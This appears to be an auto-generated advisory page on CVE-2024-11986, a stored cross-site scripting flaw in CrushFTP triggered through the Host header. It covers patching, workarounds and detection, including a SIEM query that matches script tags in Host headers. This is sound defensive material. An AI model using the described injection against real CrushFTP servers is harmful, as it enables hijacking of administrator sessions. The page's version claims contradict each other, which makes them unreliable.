CVE-2024-11986
📋 TL;DR
This vulnerability allows unauthenticated attackers to inject malicious scripts into web application logs via manipulated Host headers. When administrators view these logs through the application's interface, the scripts execute, enabling stored cross-site scripting attacks. This affects CrushFTP servers with vulnerable configurations.
💻 Affected Systems
- CrushFTP
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Administrator account compromise leading to full system takeover, data exfiltration, or ransomware deployment through session hijacking.
Likely Case
Administrator session hijacking allowing privilege escalation, data theft, or further system compromise.
If Mitigated
Limited impact with proper input validation and output encoding preventing script execution.
🎯 Exploit Status
Simple HTTP request manipulation required; no authentication needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 11.3.0 and later
Vendor Advisory: https://crushftp.com/crush11wiki/Wiki.jsp?page=Update
Restart Required: Yes
Instructions:
1. Download CrushFTP version 11.3.0 or later from official site. 2. Stop CrushFTP service. 3. Install/upgrade to patched version. 4. Restart CrushFTP service.
🔧 Temporary Workarounds
Host Header Validation
allImplement web application firewall or reverse proxy rules to validate and sanitize Host headers.
# Example nginx config: server { listen 80; server_name _; return 444; }
Log Viewer Restriction
allDisable or restrict access to web-based log viewing functionality.
# Modify CrushFTP admin interface settings to disable log viewer
🧯 If You Can't Patch
- Implement strict Content Security Policy headers to prevent script execution
- Restrict network access to CrushFTP web interface using firewall rules
🔍 How to Verify
Check if Vulnerable:
Check CrushFTP version via admin interface or server logs; versions below 11.3.0 are vulnerable.Check Version:
Check CrushFTP admin dashboard or run: java -jar CrushFTP.jar -versionVerify Fix Applied:
Confirm version is 11.3.0 or higher and test Host header injection no longer results in script execution in logs.📡 Detection & Monitoring
Log Indicators:
- Unusual Host header values containing script tags or JavaScript in web logs
- Multiple failed logins from administrator accounts after log viewing
Network Indicators:
- HTTP requests with malicious scripts in Host headers
- Unusual outbound connections from CrushFTP server after log access
SIEM Query:
source="crushftp.logs" AND (Host="*<script*" OR Host="*javascript:*")